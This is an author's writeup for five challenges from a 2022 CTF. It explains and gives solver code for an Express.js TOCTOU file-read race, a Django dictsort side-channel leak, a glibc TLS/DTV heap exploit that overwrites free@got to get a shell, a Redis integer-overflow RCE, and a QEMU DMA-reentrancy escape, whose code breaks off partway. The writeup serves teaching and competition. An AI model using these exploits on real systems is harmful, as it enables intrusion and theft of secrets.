# [2022 Fall GoN Open Qual CTF](https://dreamhack.io/ctf/39) Author's Writeup

Written by [Xion]

This only contains writeups for challenges authored by me. All challenges will be made available on the [Dreamhack Wargame site](https://dreamhack.io/wargame/).

Big shoutouts to [Theori](https://theori.io/) for the awesome [Dreamhack](https://dreamhack.io) platform, and to [KAIST Graduate School of Information Security](https://gsis.kaist.ac.kr/) and [KAIST Cyber Security Research Center](https://csrc.kaist.ac.kr/) for the sponsorship.

## Table of Contents

- [F. Heliodor](#F.-Heliodor)
- [G. Emerald Tablet](#G.-Emerald-Tablet)
- [H. Reconquista](#H.-Reconquista)
- [I. Redis-made](#I.-Redis-made)
- [J. NPU](#J.-NPU)

-----

### F. Heliodor

Category: Web
Author: [Xion]
Solvers: 2

<details>
<summary>Description</summary>

A simple JSON-based filesystem service `Heliodor`. Like the strength of the golden beryl, never lose hope in reading the flag!

</details>

<details>
<summary>Solution</summary>

**Summary**: Exploit the Express.js `res.download()` TOCTOU race condition between `fs.stat()` & `fs.createReadStream()` to read from `/proc/self/environ` based on another file's `stat` result

An Express.js website with JSON-based filesystem storage features. Let's start with the easy steps:

1. The regex that matches a (very small) subset of [jq](https://stedolan.github.io/jq/) uses `/[0-9A-Za-z_-]*/` to match object keys. This allows the attacker to use an empty key, which is problematic since the expression is split by `.` and joined back with `/` to create a path that is used with filesystem operations later on. (ex: `.ab.cd => ab/cd` (relative), `..ab.cd => /ab/cd` (absolute))
2. From the Node.js documentation for [`path.resolve()`](https://nodejs.org/docs/latest-v16.x/api/path.html#pathresolvepaths): `The given sequence of paths is processed from right to left, with each subsequent path prepended until an absolute path is constructed.` Thus, the absolute path from step 1 is returned as is, without `/tmp/jsonfs/` being prepended.

Now we have an arbitrary file read primitive[^1].

Since the given Dockerfile shows that the flag is passed as an environment variable named `FLAG`, let's just read `/proc/self/environ` and voilà! Right?

Not so fast! Try `GET /query/view/..proc.self.environ`, and we're greeted with an empty response with `Content-Length: 0`[^2]. This primitive does, however, work on regular files, so the only possible explanation is that since `/proc` is a virtual filesystem, its file sizes are reported as 0 by `stat` and friends, which is later used as `Content-Length` and limits how much of the file is read.

Check out the implementation at [expressjs/express/response.js](https://github.com/expressjs/express/blob/33e8dc303af9277f8a7e4f46abfdcb5e72f6797b/lib/response.js#L550), which eventually leads to [pillarjs/send/index.js](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L717) where we see `fs.stat()` called and its results used to [set ranges and Content-Length](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L690), which later on [creates a read stream](https://github.com/pillarjs/send/blob/b69cbb3dc4c09c37917d08a4c13fcd1bac97ade5/index.js#L790) with `fs.createReadStream()`.

Now this should immediately spark an idea for experienced players. If not, let's check the [`fs.stat()`](https://nodejs.org/docs/latest-v16.x/api/fs.html#fsstatpath-options-callback) documentation. Why is `fs.stat() -> fs.readFile()` not recommended?
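Sketched in Python purely for illustration (the real code path is the JavaScript in `send` linked above; `download()` here is a hypothetical stand-in), the anti-pattern in question looks like this:

```python
import os

# Hypothetical stand-in for the stat-then-read pattern (illustration only).
def download(path):
    size = os.stat(path).st_size   # check: size observed here...
    with open(path, 'rb') as f:    # ...use: by now the path may refer to
        return f.read(size)        #    different contents (TOCTOU window)
```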
Checking out similar warnings, we see that `Doing so introduces a race condition, since other processes may change the file's state between the two calls` - this also applies to `fs.stat() -> fs.createReadStream()`: we have a TOCTOU race condition between when the file size is checked and when it is actually used.

Let's continue on the not-so-easy steps:

3. To actually trigger the race condition, we need a path in the filesystem that represents `/proc/self/environ` in one case, and a real file with a large enough size in another. There is a great place for this: `/proc/self/fd/`, where each open file descriptor is represented as a symlink to its corresponding file or directory. We can race the following two requests:
   1. `GET /query/view/..etc.passwd` to open a file descriptor for `/etc/passwd`. Other files would also work, for example `/heliodor/app.js`.
   2. `GET /query/view/..proc.self.environ` to open a file descriptor for `/proc/self/environ`.

   Then, we can use the following request to read from the file descriptor:

   3. `GET /query/view/..proc.self.fd.N`, where `N` is the file descriptor being raced.
4. `/proc/self/environ` is leaked if the requests are executed in the following order:
   1. Req #1: `open("/etc/passwd")` opens `/etc/passwd` as fd `N`
   2. **Req #3: `stat("/proc/self/fd/N")` stats `/proc/self/fd/N -> /etc/passwd`**
   3. Req #1: `close(N)` closes fd `N`
   4. Req #2: `open("/proc/self/environ")` opens `/proc/self/environ` as fd `N` (fd reused)
   5. **Req #3: `open("/proc/self/fd/N")` opens `/proc/self/fd/N -> /proc/self/environ`**
   6. Req #3: the opened file `/proc/self/environ` is read with the `stat`ed size as its length, which is the size of `/etc/passwd`

Players can launch the attack by running the three requests in parallel. A local shell is given to avoid players unintentionally DoSing the challenge server, but triggering this race condition in fact also works remotely over the network without much of a hassle.

The above attack scenario uses two different files to race a file descriptor, but directories also work (`/query/list/`), which is the case in the author's solver code.

</details>

<details>
<summary>Solver Code</summary>

The exploit below uses the `/query/list/` endpoint to race two directory fds. As explained in the solution, one can completely ignore all the "jsonfs" features and only use `res.download()` to race between two file fds.

```python=1
#!/usr/bin/env python3
# init_jsonfs.py
import requests

from setting import HOST, PORT

# reset jsonfs
reset_url = f'http://{HOST}:{PORT}/update/reset'
requests.post(reset_url).raise_for_status()

# write files to extend race window
init_url = f'http://{HOST}:{PORT}/update/patch'
requests.post(init_url, json=[""]*100).raise_for_status()

# create ./self/environ
init_url = f'http://{HOST}:{PORT}/update/patch'
requests.post(init_url, json={'self': {'environ': 'A'*10000}}).raise_for_status()
```

```python=1
#!/usr/bin/env python3
# lister.py
# NOTE: Run at least two in parallel!
import requests

from setting import HOST, PORT

url = f'http://{HOST}:{PORT}/query/list/'
url += ','.join(['.', '..proc'] * 1000)

for cnt in range(0x100):
    print(cnt)
    requests.get(url).raise_for_status()
```

```python=1
#!/usr/bin/env python3
# reader.py
import requests
import re

from setting import HOST, PORT

url = f'http://{HOST}:{PORT}/query/view/..proc.self.fd.%d.self.environ'

# Try our best to widen the race window by making send() parse ranges
# Range parsing happens between fs.stat() and fs.createReadStream()
range_hdr = f'bytes=0-10000,'  # One large range including all
range_hdr += ','.join(['9-0', '0-1', '1-9', 'a-a'] * 1000)  # 4000 other ranges
headers = {
    'Range': range_hdr,
    'if-range': '"',  # bypass invalid ranges by simulating expired ranges
    'ETag': None,
}

for cnt in range(0x200):
    print(cnt)
    res = requests.get(url % 23, headers=headers).content
    if match := re.search(rb'FLAG=(GoN\{[^\}]+\})', res):
        print(match.group(1))
        break
```

```python=1
#!/usr/bin/env python3
# setting.py
HOST, PORT = 'heliodor', 58283
```

</details>

### G. Emerald Tablet

Category: Web
Author: [Xion]
Solvers: 7

<details>
<summary>Description</summary>

The magically radiant `Emerald Tablet` is known to bless its users with everlasting memory. It is rumored that with unparalleled determination and willpower one gets to know the secrets of the universe...

</details>

<details>
<summary>Solution</summary>

**Summary**: Infoleak in Django `dictsort` via an attacker-controlled key ([CVE-2021-45116])

The given service can be used to list, view and upload inscriptions like a bulletin board system. An inscription with the flag as its contents is already uploaded, but viewing an inscription requires a UUID key that is randomly generated at upload time and unknown even to the uploader.

A sorting feature is available via the Django `dictsort` filter with user-controlled sort criteria, and we see that Django 4.0 is used: [CVE-2021-45116] is applicable. The linked article explains the vulnerability very well, so I'll skip explaining the exploit in detail. In short, the key idea is that although we do not know any of the UUID keys, we can leak information by sorting on each character of the UUID key and checking how the order of every pair changes after sorting. Take for example 4 unknown strings `A, B, C, D` of length >= 1.

- Before sorting: `A, B, C, D`
- After sorting by the character at index 0: `C, B, D, A`
  - From the sort result itself, we see that `C[0] <= B[0] <= D[0] <= A[0]`.
  - By checking how every pair of strings changes its order, we see that `(C, B)`, `(C, A)`, `(B, A)`, `(D, A)` changed.
    - `C[0] < B[0]`, `C[0] < A[0]`, `B[0] < A[0]`, `D[0] < A[0]` are guaranteed.
  - Combining the two results, we see that `C[0] < B[0] <= D[0] < A[0]`. Assuming that only the characters `a`, `b` and `c` are possible, we can conclude that `C[0] == 'a'`, `B[0] == D[0] == 'b'`, `A[0] == 'c'`.

Note that the pair-order constraints work because `dictsort` is a *stable sort*, i.e. elements with the same sort criteria value retain their original relative order.
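As a toy illustration of that inference, here is a short Python sketch (Python's `sorted()` is also stable; the hidden values are simply the ones from the example above):

```python
# Toy reproduction of the ordering side channel using a stable sort.
vals = {'A': 'c', 'B': 'b', 'C': 'a', 'D': 'b'}   # hidden first characters
before = ['A', 'B', 'C', 'D']
after = sorted(before, key=lambda name: vals[name])
print(after)                                       # ['C', 'B', 'D', 'A']

# The sorted order alone only yields non-strict (<=) relations between
# neighbors, but any pair whose relative order changed must differ strictly:
# a stable sort never reorders elements with equal keys.
for i, x in enumerate(before):
    for y in before[i + 1:]:
        if after.index(x) > after.index(y):
            print(f'{y}[0] < {x}[0]')              # the four strict inequalities above
```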
[CVE-2021-45116]: https://blog.sonarsource.com/disclosing-information-with-a-side-channel-in-django/

</details>

<details>
<summary>Solver Code</summary>

```python=1
#!/usr/bin/env python3
# async libs to accelerate sprays. This is completely optional :)
import asyncio as aio
import aiohttp
import requests
from bs4 import BeautifulSoup as BS
from tqdm import tqdm
import z3
import uuid

HOST, PORT = 'localhost', 59909
URL = f'http://{HOST}:{PORT}'
TARGET_COUNT, INCREMENT = 100, 100

def get_list(sort_key='-id'):
    bs = BS(requests.get(f'{URL}/list/?sort={sort_key}').text, 'html.parser')
    return [int(e.find('th').string) for e in bs.find('tbody').find_all('tr')]

async def gather(url, data, spraycnt, n=10):
    semaphore = aio.Semaphore(n)  # limit on max connections
    conn = aiohttp.TCPConnector(limit_per_host=50, limit=100, ttl_dns_cache=300)
    async with aiohttp.ClientSession(connector=conn) as session:
        async def poster(url):
            async with semaphore:
                async with session.post(url, data=data, allow_redirects=False) as response:
                    return response.status == 302 and response.headers['Location'] == '/list/'
        return all(await aio.gather(*(poster(url) for _ in range(spraycnt))))

# spray inscriptions for random uuids
def spray_up_to(cnt):
    last = max(get_list())
    spraycnt = cnt - last
    if spraycnt > 0:
        loop = aio.get_event_loop()
        assert loop.run_until_complete(gather(f'{URL}/upload/', {
            'inscriber': 'Xion',
            'title': 'spray',
            'data': 'a',
        }, spraycnt))

spray_up_to(TARGET_COUNT)

# check sprayed inscriptions
max_id = max(get_list())
print(f'{max_id = }')

# assert unsorted == sorted w/ id to verify that dictsort is a stable sort
assert get_list('key.urn.0') == list(range(1, max_id + 1))

flag_uuid = ''
i = len(flag_uuid)
while i < 32:
    # Inequality is a DAG-like one
    # Probably easily solvable with DP-like approach, but why bother :shrug:
    s = z3.Solver()
    sv = [0] + [z3.BitVec(f'{i}_{j}', 4) for j in range(1, max_id + 1)]

    if i == 12:  # uuid version 0x4
        i += 1
        flag_uuid += '4'
        print(f'{i:02d}/32: {flag_uuid = }')
        continue
    elif i == 16:  # uuid variant 1 (0b10??)
        for v in sv[1:]:
            s.add(v & 0b1100 == 0b1000)

    sort = get_list(f'key.hex.{i}')

    # Info from sorted (w/o unsorted)
    for j in range(1, len(sort)):
        s.add(z3.ULE(sv[sort[j - 1]], sv[sort[j]]))

    # Info from unsorted -> sorted
    for j in tqdm(range(len(sort))):
        for k in range(j + 1, len(sort)):
            if sort[j] > sort[k]:
                s.add(z3.ULT(sv[sort[j]], sv[sort[k]]))

    # Solution exists and is unique
    assert s.check() == z3.sat
    m = s.model()
    v = m[sv[1]].as_long()
    s.add(sv[1] != v)

    # Solution not unique, need more sprays
    if s.check() != z3.unsat:
        print('Failed uniqueness check, spraying more & retrying...')
        max_id += INCREMENT
        spray_up_to(max_id)
        continue

    i += 1
    flag_uuid += f'{v:x}'
    print(f'{i:02d}/32: {flag_uuid = }')

flag_uuid = str(uuid.UUID(hex=flag_uuid))
print(f'Leaked {flag_uuid = }')

bs = BS(requests.get(f'{URL}/view/?id=1&key={flag_uuid}').text, 'html.parser')
flag = bs.find('textarea').string.strip()
print(f'{flag = }')
```

</details>

### H. Reconquista

Category: Pwnable
Author: [Xion]
Solvers: 0

<details>
<summary>Description</summary>

It is the year 2084. The world now bans all Notes from pwnable challenges. Anyone who attempts to make Notes is imprisoned by the Infinite Loop Enforcers in a mere std::thread(). As an avid Make Notes pwnable challenge solver, take on the `Reconquista` and restore the world order to the good old days of having countless "baby" Make Note pwnables with zero solvers.

</details>

<details>
<summary>Solution</summary>

**Summary**: TLS overflow to overwrite `tcbhead_t.dtv` & trigger arbitrary free + fake chunk realloc

This is just the usual *Make Notes* style pwnable, but with the menu loop inside a thread. An array of 200 `std::string` pointers is saved in TLS.

Since new notes are inserted without a bounds check, there is an OOB bug on this array inside TLS where one can overwrite at most 55 (= 255 - 200) `std::string` pointers. With either debugging or prior knowledge, one can notice that TLS (in this case, the array of pointers) directly precedes the TCB in memory. Thus, the OOB writes from the array linearly overflow into the TCB structure.

Now one can try overflowing all 55 pointers, but immediately after the 6th overwrite, stack smashing is detected and the process aborts. This is because the TCB structure contains [`uintptr_t stack_guard`](https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/nptl/tls.h#L51), which is used as the stack canary for the corresponding thread. Although exploiting this has shown up many times in CTFs, it cannot be used in this challenge since there is no stack overflow; it simply limits the possible overwrites to 5 pointers or fewer[^3].

Since there are only 5 pointers to overwrite, one can exhaustively check what is in the first 0x28 bytes of the TCB structure. Notably, there is [`dtv_t *dtv`](https://elixir.bootlin.com/glibc/glibc-2.35/source/sysdeps/x86_64/nptl/tls.h#L46), a pointer to the DTV (Dynamic Thread Vector). The DTV is an array of pointers to the TLS sections required by the executable and the loaded libraries.
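For reference, here are the offsets of the first fields of the x86-64 `tcbhead_t` from the glibc 2.35 header linked above, i.e. what each of the first six OOB pointer writes lands on (listed as a small Python table for convenience):

```python
# First fields of glibc 2.35's x86-64 tcbhead_t (sysdeps/x86_64/nptl/tls.h).
TCBHEAD_FIELDS = {
    0x00: 'tcb',                             # 1st OOB pointer write
    0x08: 'dtv',                             # 2nd: pointer to the DTV -- the target
    0x10: 'self',                            # 3rd
    0x18: 'multiple_threads / gscope_flag',  # 4th (two ints)
    0x20: 'sysinfo',                         # 5th
    0x28: 'stack_guard',                     # 6th: per-thread stack canary -> abort
}
```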
Checking how this structure is allocated and resized when needed, one can see that the thread stack is cached for reuse after thread exit at [`get_cached_stack()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/nptl/allocatestack.c#L134), where the DTV is cleared and re-initialized. Following [`_dl_allocate_tls_init()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/elf/dl-tls.c#L542), one can see that when the DTV to be reused is not big enough, it is resized via `realloc()` in [`_dl_resize_dtv()`](https://elixir.bootlin.com/glibc/glibc-2.35/source/elf/dl-tls.c#L484). Since the DTV counter can be controlled by the attacker with a well-placed `std::string`, one can trigger an arbitrary free via DTV clearing as well as a fake chunk realloc via DTV resizing[^4].

Now with the above heap exploit primitives, the challenge is back to a C++ *Make Notes* style pwnable. The arbitrary free primitive is hard to use since we do not have any address leaks. The fake chunk realloc is more useful, as the fake chunk and both its prev & next chunks can be prepared as needed. These are the steps to exploit the fake chunk realloc primitive in the author's solution:

1. Allocate 200 dummy notes to fill up the array.
2. Create a note (index = 200). The buffer area of this note serves as the fake chunk's prevsize & size fields. Set size = 0x565 (see the arithmetic check right after this list).
   - `0x565 == (0x140 + 0x420) | PREV_INUSE | NON_MAIN_ARENA`
   - `PREV_INUSE` because consolidation is not desired, and `NON_MAIN_ARENA` because it actually is in a non-main arena (the thread arena).
   - `0x140 + 0x420` because DTV resizing will realloc as chunk size `0x140`, splitting out `0x420`.
     - If this split chunk size falls within tcache bin sizes, it will be stashed into a tcache bin. The thread initialization logic is run by the thread spawner (the main thread), so it gets stashed into the main thread's tcache, which cannot be accessed inside the thread loop.
     - Making the split chunk size larger than the tcache maximum causes it to be inserted as an unsorted chunk into its corresponding arena, which is the thread arena.
3. Create a note (index = 201, i.e. `dtv`). This pointer's address - 0x10 will be reallocated.
4. Create a note (index = 202). Located at the next chunk relative to the fake chunk, create two fake chunk headers with valid sizes and PREV_INUSE set. These serve as guard chunks to pass abort checks and prevent consolidation.
5. Exit the thread with menu choice 3, immediately re-entering a new thread and triggering the fake chunk realloc.
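A quick sanity check of the size arithmetic from step 2, with the values taken straight from the list above:

```python
# Fake chunk size written into note #200's buffer (step 2).
PREV_INUSE, NON_MAIN_ARENA = 0x1, 0x4
DTV_REALLOC_SIZE = 0x140  # chunk size requested by the realloc() in _dl_resize_dtv()
REMAINDER = 0x420         # split-off remainder, larger than the 0x410 tcache maximum

fake_size = (DTV_REALLOC_SIZE + REMAINDER) | PREV_INUSE | NON_MAIN_ARENA
assert fake_size == 0x565
```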
The above steps result in a 0x420-sized fake chunk located at an address higher than the thread top, so that allocations from the chunk later overlap with chunks extended from top. Starting from the first note allocation, these chunks are immediately split out and allocated from the unsorted chunk, in order:

1. 0x290-sized chunk for the tcache_perthread_struct of the thread arena
2. 0x30-sized chunk for the dtor_list (destructor list chain) of `NoteManager`
3. Newly created `std::string` note

The pwndbg output would be something like this (not real addresses but offsets from the heap base):

```
pwndbg> heap 0x003270
Allocated chunk | PREV_INUSE | NON_MAIN_ARENA   <= tcache_perthread_struct
Addr: 0x003270
Size: 0x295

Allocated chunk | PREV_INUSE | NON_MAIN_ARENA   <= dtor_list for nm
Addr: 0x003500
Size: 0x35

Allocated chunk | PREV_INUSE | NON_MAIN_ARENA   <= newly created chunk
Addr: 0x003530
Size: 0x35
                                                <= unsorted chunk here!
Allocated chunk (PREV_INUSE = 0)                <= fake chunk guard
```

Consecutive allocations deplete the unsorted chunk and start to expand top up to the point where it overlaps with the chunks allocated from the unsorted chunk (`tcache_perthread_struct`, `dtor_list`, `std::string`, etc.). Thus we now have overlapping chunks, which is especially powerful due to the overlap with the tcache struct. These are the steps to use the overlapping chunks to leak a libc address, poison `tcache_perthread_struct` and fetch the poisoned fake chunk to overwrite `free@got` of libstdc++ and pop a shell (initial depletion allocations omitted):

1. Create a `std::string` whose buffer overlaps with the tcache bin counts. Set the 0x100 and 0x1f0 tcache bin counts to 1.
2. Create a `std::string` whose buffer pointer overlaps with the tcache 0x100 bin; [buf, buf+0xf0) must then include the tcache 0x1f0 bin. This is guaranteed with an embedded buffer (`length <= 0xf`).
3. Create more `std::string`s to partially overwrite an already existing string buffer address:
   1. Use the fact that `heap_info`, located at the start of the thread heap mmap region, is aligned to 0x4000000. This is due to [alloc_new_heap()](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/arena.c#L518).
   2. Partially overwrite 3 bytes ending with `"\xa0\x08\x00"`. This points the buffer to `thread_arena.next`, which stores the address of main_arena.
4. View the overwritten string to leak main_arena (libc base).
5. Pop the tcache 0x100 chunk to overwrite the tcache 0x1f0 bin, corrupting it to (`free@got` of libstdc++ - 0x10).
6. Pop the tcache 0x1f0 chunk to get an arbitrary write at `free@got`, overwriting it with `system` so that `system("sh")` is triggered at the `free(old_buf)` in `std::string`'s buffer-doubling logic.

</details>

<details>
<summary>Solver Code</summary>

```python=1
#!/usr/bin/env python3
from pwn import *

DEBUG = False
HOST, PORT = 'localhost', 38202

binary = ELF('../deploy/reconquista')
libc = ELF('./libc.so.6')
libcpp = ELF('./libstdc++.so.6.0.30')
#context.log_level = 'debug'

def menu(sel):
    p.sendlineafter(b'>> ', str(sel).encode())

def create(s):
    menu(1)
    p.sendlineafter(b'Payload: ', s)

def view(idx):
    menu(2)
    p.sendlineafter(b'Call Sign: ', str(idx).encode())
    p.recvuntil(b'Intel: ')
    return p.recvuntil(b'\n[[ Operation Plans ]]', drop=True)

def exit_thread():
    menu(3)

if DEBUG:
    p = process(['../src/reconquista'])
else:
    p = remote(HOST, PORT)

for _ in range(200):
    create(b'AAAA')

# We now construct the free dtv to be freed by _dl_resize_dtv().
# This chunk is located at thread arena, but free is done by the main thread:
# If it gets inserted to the main thread tcache it's difficult to get it back out.
create(b'PREVSIZE' + p16(0x565))  # 0x560 - 0x140 = 0x420 > tcache max size
create(b'__DTV___')

# Guard the fake chunk w/ two consecutive PREV_INUSE chunks
payload = bytearray(cyclic(0x200))
payload[0xe8 :0x108] = p64(0x21) + p64(0)*3
payload[0x108:0x128] = p64(0x21) + p64(0)*3
create(payload)

# Trigger fake DTV free
exit_thread()

# Spray from bottom
create(b'chunk#4_')
for _ in range(10):
    create(b'A'*0x10)  # 0x30 + 0x30
create(b'A'*0x20)  # 0x30 + 0x50
for _ in range(94):
    create(b'A'*0x10)  # 0x30 + 0x30

# Chunk #1 @ 0x003170: set 0x100 & 0x1f0 tcache bins count = 1
payload = b'B'*0xf0
payload += p64(0) + p64(0x295)
payload += p16(0) * 14 + p16(1) + p16(0)*14 + p16(1) + p16(0) * 34
payload += p64(0) * 12  # zeros up to 0xd0
assert len(payload) == 0x1e0
create(payload)

# Chunk #2 @ 0x003360: overlap tcache 0x100 bin w/ string.buf
create(b'chunk#2')

# Chunk #3 prep @ 0x003390: prep chunk #3 partial overwrite
for _ in range(2):
    create(b'C'*0x20)
for _ in range(3):
    create(b'C')

# Chunk #3 @ 0x003520: partial overwrite as &thread_arena.next to leak main_arena
create(b'\xa0\x08')

# Chunk #4 @ 0x003530: buf partially overwritten, leak main_arena
main_arena = u64(view(0))
log.info (f'{main_arena = :#14x}')
libc.address = main_arena - 0x219c80
assert libc.address & 0xfff == 0
log.success(f'{libc.address = :#14x}')

HEAP_MAX = 0x4000000  # 2 * 4 * 1024 * 1024 * 8
offset = 0xe7000  # libm.so.6
offset += 0x1000 + 0x807000  # mmaps
offset += HEAP_MAX * 2  # aligned alloc
thread_heap = (libc.address - offset + (HEAP_MAX - 1)) & ~(HEAP_MAX - 1)
log.info (f'{thread_heap = :#14x}')
libcpp.address = libc.address + 0x248000
log.info (f'{libcpp.address = :#14x}')

# Chunk #5 @ 0x003370: pop tcache 0x100 chunk
payload = p64(0)*13 + p64(libcpp.got['free'] - 0x10)
payload = payload.ljust(0xf0, b'\x00')
create(payload)

# Chunk #6 @ libcpp.got['free'] - 0x10 - 0x10: pop tcache 0x1f0 chunk for system("sh")!
payload = b'sh'.ljust(0x10, b'\x00')
payload += p64(libc.sym['system'])
payload = payload.ljust(0xf8, b'\x00')
create(payload)

p.sendline(b'cat flag')
p.interactive()
```

</details>

### I. Redis-made

Category: Pwnable
Author: [Xion]
Solvers: 0

<details>
<summary>Description</summary>

Marcel Duchamp's Fountain (1917) had a profound influence on what we think art is. 105 years after the groundbreaking artwork, I present to you a CTF chal heavily influenced by Ready-made art: `Redis-made`.

</details>

<details>
<summary>Solution</summary>

**Summary**: RCE on Redis latest (7.0.4) without `@admin` or `@dangerous` ([CVE-2022-35951], ~~disclosure in progress~~ disclosed)

This challenge is based on Redis, a popular in-memory key-value store. The challenge is "ready-made", i.e. nothing is given but the latest Redis Docker image with the flag copied in. There are no publicly known vulnerabilities in Redis 7.0.4, so this challenge calls for a brand new vulnerability exploitable up to arbitrary code execution. Since neither the vulnerability nor the patch is publicly available, I'll refrain from dropping a 0-day here.

Contrary to how crazy this challenge might seem, it was meant to be a not-so-crazy introduction to finding new vulnerabilities with a *specific methodology* :wink: that is frequently used when analyzing a new target.

**Updated:** The intended solution calls for [CVE-2022-35951].

Note that this vulnerability did not pop out of thin air; it is very closely related to [CVE-2022-31144], fixed in 7.0.4. Searching by the CVE number we find [PR #11002](https://github.com/redis/redis/pull/11002) and [Issue #10968](https://github.com/redis/redis/issues/10968), which contain a crash PoC and a root cause explanation. Let us analyze this vulnerability and build up to the intended solution.

To start with, this vulnerability occurs in Redis streams. Detailed explanations are available in the [Redis Streams tutorial](https://redis.io/docs/data-types/streams-tutorial/) and the [XAUTOCLAIM command documentation](https://redis.io/commands/xautoclaim/). The vulnerability occurs where `XAUTOCLAIM` returns a list of IDs deleted from the PEL while claiming stream entries. The array to store the deleted entries' IDs, `deleted_ids`, is only [allocated with size `count`](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3402), as this is by definition the maximum number of entries that the command attempts to claim. However, versions up to 7.0.3 did not count deleted entries against this limit, so the fix was to simply [account for them](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3424). Seems correct, right?

There is, in fact, a critical exploitable anti-pattern. Revisit the [`deleted_ids` allocation](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3402) and we see `zmalloc(count * sizeof(streamID))` instead of an overflow-checked, `calloc()`-like approach. Since [`count` is only bounded by LONG_MAX](https://github.com/redis/redis/blob/7.0.4/src/t_stream.c#L3359), simply adding `0x1000000000000000` to a normal `count` value overflows the allocation size and enables us to overflow the heap with exactly the same primitives as [CVE-2022-31144]!
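The size arithmetic behind that, worked out in Python (`streamID` is two `uint64_t` fields, `ms` and `seq`, so 16 bytes):

```python
# 64-bit size_t wraparound behind the undersized zmalloc(count * sizeof(streamID)).
SIZEOF_STREAMID = 16
count = 100 + 0x1000000000000000        # still <= LONG_MAX, so the bound check passes

alloc_size = (count * SIZEOF_STREAMID) % 2**64  # what zmalloc() actually receives
assert alloc_size == 100 * SIZEOF_STREAMID      # 0x640, same as for count = 100,
                                                # yet up to `count` IDs may be appended
```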
The later exploitation steps are simple: we have a near-arbitrary `streamID` heap overflow, so use it to forge objects, achieve AAR/W and pop a shell.

The *specific methodology* for analyzing a new target simply meant checking recent vulnerabilities and analyzing their patches :slightly_smiling_face:

P.S.: [CVE-2022-35951] was discovered while designing this challenge, which originally called for exploiting [CVE-2022-31144]. The exploit script literally required a single `count` value change to also work on 7.0.4.

[CVE-2022-35951]: https://github.com/redis/redis/security/advisories/GHSA-5gc4-76rx-22c9
[CVE-2022-31144]: https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh

</details>

<details>
<summary>Solver Code</summary>

Try it out yourself! [Redis-made @ dreamhack.io](https://dreamhack.io/wargame/challenges/595/)

```
$ md5sum solver.py
89319e88d2dbd19841d160b8227158fc  solver.py
```

</details>

### J. NPU

Category: Pwnable
Author: [Xion]
Solvers: 1

<details>
<summary>Description</summary>

After years of laborious development, KAIST GoN finally managed to build a bleeding-edge device to serve all the "Make Note" cravings: Notes Processing Unit, a.k.a `NPU`. Try it out on QEMU and tell us what you think!

</details>

<details>
<summary>Solution</summary>

**Summary**: Custom QEMU device exploit via [DMA MMIO reentrancy] ([Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape])

A custom QEMU device with DMA MMIO features. None of the operations has a vulnerability like a buffer overflow or an exploitable integer overflow. However, a mind-blowing vulnerability exists in the guest DMA buffer read/write operations: [DMA MMIO reentrancy]. This is explained in depth in the [Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape] paper.

Since the paper explains the vulnerability so well, I'll skip the details. In short, unlike actual hardware using DMA, virtual devices are prone to "DMA reentrancy", which happens when the guest DMA buffer points to a DMA MMIO region instead of a plain memory region. A guest read/write performed during a DMA operation then recursively triggers another DMA operation, which may divert the device's state machine into an invalid state (mostly UAF).

The NPU device implementation is also prone to a DMA reentrancy attack through the `WRITE_NOTE_PROCESS_RWVEC` batched MMIO operation. Setting `RWvec.buf` to the NPU device's MMIO region recursively triggers MMIO operations, which may cause the current `Note` to be freed when the current note is resized via `WRITE_RESET` or `WRITE_NOTE_RESIZE`. The following read/write operations through the RWvec then result in a UAF, which can be exploited to leak data and overwrite heap structures in the host QEMU process.

The author's exploit uses DMA reentrancy to trigger a UAF and read a tcache pointer, decodes it to leak the heap address and compute the TCG RWX region address[^5], then uses DMA reentrancy again to trigger a UAF and poison tcache so that a `Note` is allocated inside the RWX region, filled with NOPs terminated by shellcode.
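The "decodes it" step refers to glibc's safe-linking of tcache `next` pointers. A minimal Python sketch of the decoding idea, assuming the usual case where the encoded pointer targets the same heap region it is stored in (the `+0x820` page-carry corner case is handled explicitly in the C solver below; the example value is made up):

```python
# glibc >= 2.32 safe-linking: a tcache next pointer P stored at address L is
# saved as E = (L >> 12) ^ P, so leaking E alone reveals P when L and P share
# their upper bits.
def decode(e):
    p = 0
    for shift in (36, 24, 12, 0):  # recover 12 bits at a time, top-down
        p |= (e ^ (p >> 12)) & (0xfff << shift)
    return p

heap_ptr = 0x5555666672a0                    # example (made-up) chunk address
enc = ((heap_ptr + 0x820) >> 12) ^ heap_ptr  # what the UAF read leaks
assert decode(enc) == heap_ptr
```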
P.S.: DMA reentrancy is still an active issue in many virtualization software stacks including QEMU: see [CVE-2022-2692](https://gitlab.com/qemu-project/qemu/-/issues/1171)!

[DMA MMIO reentrancy]: https://gitlab.com/qemu-project/qemu/-/issues/556
[Matryoshka Trap: Recursive MMIO Flaws Lead to VM Escape]: https://qiuhao.org/Matryoshka_Trap.pdf

</details>

<details>
<summary>Solver Code</summary>

The solver code is not refined, so it might be a bit bloated :slightly_frowning_face: Most heap operations are done through DMA reentrancy to maximize exploit stability.

```c=1
/*
 * References:
 * https://ctftime.org/writeup/31188
 * http://pzhxbz.cn/?p=164
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>

#define TRIGGER 0

#define CHECK(condition) \
    do { \
        if (!(condition)) { \
            printf("[!] Check failed at %s:%d: %s\n", \
                   __FILE__, __LINE__, #condition); \
            abort(); \
        } \
    } while (0);
#define PCHECK(condition) \
    do { \
        if (!(condition)) { \
            printf("[!] Check failed at %s:%d (%m): %s\n", \
                   __FILE__, __LINE__, #condition); \
            abort(); \
        } \
    } while (0);

#define READ_STATUS_CODE 0x0
#define READ_RWV_SUCCESS_COUNT 0x10
#define READ_NOTE_LEN 0x100
#define READ_NOTE_SCALAR 0x110

#define WRITE_RESET 0x0
#define WRITE_IDX 0x10
#define WRITE_LEN_OR_OFS 0x20
#define WRITE_RWV 0x30
